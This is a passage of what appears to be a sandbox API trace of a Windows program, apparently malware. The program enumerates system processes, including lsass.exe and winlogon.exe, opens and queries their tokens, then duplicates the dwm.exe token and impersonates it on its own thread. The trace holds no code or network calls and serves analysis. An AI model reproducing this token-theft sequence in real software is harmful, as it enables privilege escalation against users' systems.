lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0076.583] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x1dc [0076.583] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.583] CloseHandle (hObject=0x1dc) returned 1 [0076.583] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0076.584] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x1dc [0076.584] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.584] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.584] CloseHandle (hObject=0x1f8) returned 1 [0076.584] CloseHandle (hObject=0x1dc) returned 1 [0076.584] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.585] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x1dc [0076.585] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.585] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.585] CloseHandle (hObject=0x1f8) returned 1 [0076.585] CloseHandle (hObject=0x1dc) returned 1 [0076.585] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0076.586] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x1dc [0076.586] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.586] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.586] CloseHandle (hObject=0x1f8) returned 1 [0076.586] CloseHandle (hObject=0x1dc) returned 1 [0076.586] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.587] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x1dc [0076.587] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.587] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.587] CloseHandle (hObject=0x1f8) returned 1 [0076.587] CloseHandle (hObject=0x1dc) returned 1 [0076.587] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0076.588] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1dc [0076.588] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.588] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.588] CloseHandle (hObject=0x1f8) returned 1 [0076.588] CloseHandle (hObject=0x1dc) returned 1 [0076.588] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0076.588] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1dc [0076.589] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.589] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.589] CloseHandle (hObject=0x1f8) returned 1 [0076.589] CloseHandle (hObject=0x1dc) returned 1 [0076.589] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0076.589] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1dc [0076.589] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.589] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.590] CloseHandle (hObject=0x1f8) returned 1 [0076.590] CloseHandle (hObject=0x1dc) returned 1 [0076.590] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0076.590] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1dc [0076.590] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.590] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.590] CloseHandle (hObject=0x1f8) returned 1 [0076.591] CloseHandle (hObject=0x1dc) returned 1 [0076.591] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.591] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x1dc [0076.591] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.591] CloseHandle (hObject=0x1dc) returned 1 [0076.591] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.592] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x1dc [0076.592] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.592] CloseHandle (hObject=0x1dc) returned 1 [0076.592] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.593] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1dc [0076.593] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.593] CloseHandle (hObject=0x1dc) returned 1 [0076.593] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.594] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x1dc [0076.594] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.594] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.594] CloseHandle (hObject=0x1f8) returned 1 [0076.594] CloseHandle (hObject=0x1dc) returned 1 [0076.594] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.595] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x1dc [0076.595] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.595] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.595] CloseHandle (hObject=0x1f8) returned 1 [0076.595] CloseHandle (hObject=0x1dc) returned 1 [0076.595] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0076.595] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x1dc [0076.595] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.596] CloseHandle (hObject=0x1dc) returned 1 [0076.596] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.596] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x1dc [0076.596] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.596] CloseHandle (hObject=0x1dc) returned 1 [0076.596] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.597] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x1dc [0076.597] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.597] CloseHandle (hObject=0x1dc) returned 1 [0076.597] Process32Next (in: hSnapshot=0x1e0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0076.598] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x1dc [0076.598] OpenProcessToken (in: ProcessHandle=0x1dc, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x1f8) returned 1 [0076.598] GetTokenInformation (in: TokenHandle=0x1f8, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.598] DuplicateToken (in: ExistingTokenHandle=0x1f8, ImpersonationLevel=0x2, DuplicateTokenHandle=0x219fdd0 | out: DuplicateTokenHandle=0x219fdd0*=0x1e8) returned 1 [0076.598] SetThreadToken (Thread=0x0, Token=0x1e8) returned 1 [0076.598] CloseHandle (hObject=0x1e8) returned 1 [0076.598] CloseHandle (hObject=0x1f8) returned 1 [0076.598] CloseHandle (hObject=0x1dc) returned 1 [0076.598] CloseHandle (hObject=0x1e0) returned 1 [0076.598] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0076.599] wsprintfW (in: param_1=0x219fb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0076.599] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x219fd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x219fd28) returned 0xffffffff [0076.600] RtlExitUserThread (Status=0x0) Thread: id = 25 os_tid = 0xa2c [0076.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x219fdc8 | out: TokenHandle=0x219fdc8*=0x32c) returned 1 [0076.673] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x12, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0076.695] GetTokenInformation (in: TokenHandle=0x32c, TokenInformationClass=0x13, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0076.695] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x219fde8, TokenInformationLength=0x38, ReturnLength=0x219fdcc | out: TokenInformation=0x219fde8, ReturnLength=0x219fdcc) returned 1 [0076.695] CloseHandle (hObject=0x3a8) returned 1 [0076.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0076.871] Process32First (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.871] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0076.871] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0076.872] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x3ac [0076.872] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.872] CloseHandle (hObject=0x3ac) returned 1 [0076.872] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0076.873] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x3ac [0076.873] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.873] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.873] CloseHandle (hObject=0x3b0) returned 1 [0076.873] CloseHandle (hObject=0x3ac) returned 1 [0076.873] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.874] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x3ac [0076.874] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.874] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.874] CloseHandle (hObject=0x3b0) returned 1 [0076.874] CloseHandle (hObject=0x3ac) returned 1 [0076.874] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0076.875] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x3ac [0076.875] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.875] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.875] CloseHandle (hObject=0x3b0) returned 1 [0076.875] CloseHandle (hObject=0x3ac) returned 1 [0076.875] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.876] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x3ac [0076.876] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.876] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.876] CloseHandle (hObject=0x3b0) returned 1 [0076.876] CloseHandle (hObject=0x3ac) returned 1 [0076.876] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0076.877] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3ac [0076.877] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.877] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.877] CloseHandle (hObject=0x3b0) returned 1 [0076.877] CloseHandle (hObject=0x3ac) returned 1 [0076.877] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0076.878] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3ac [0076.878] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.878] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.878] CloseHandle (hObject=0x3b0) returned 1 [0076.878] CloseHandle (hObject=0x3ac) returned 1 [0076.878] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0076.878] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3ac [0076.878] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.879] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.879] CloseHandle (hObject=0x3b0) returned 1 [0076.879] CloseHandle (hObject=0x3ac) returned 1 [0076.879] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0076.879] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3ac [0076.879] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.879] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.879] CloseHandle (hObject=0x3b0) returned 1 [0076.879] CloseHandle (hObject=0x3ac) returned 1 [0076.879] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.880] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x3ac [0076.880] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.880] CloseHandle (hObject=0x3ac) returned 1 [0076.880] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.881] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x3ac [0076.881] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.881] CloseHandle (hObject=0x3ac) returned 1 [0076.881] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.881] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x3ac [0076.881] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.881] CloseHandle (hObject=0x3ac) returned 1 [0076.882] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.882] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x3ac [0076.882] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.882] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.882] CloseHandle (hObject=0x3b0) returned 1 [0076.882] CloseHandle (hObject=0x3ac) returned 1 [0076.882] 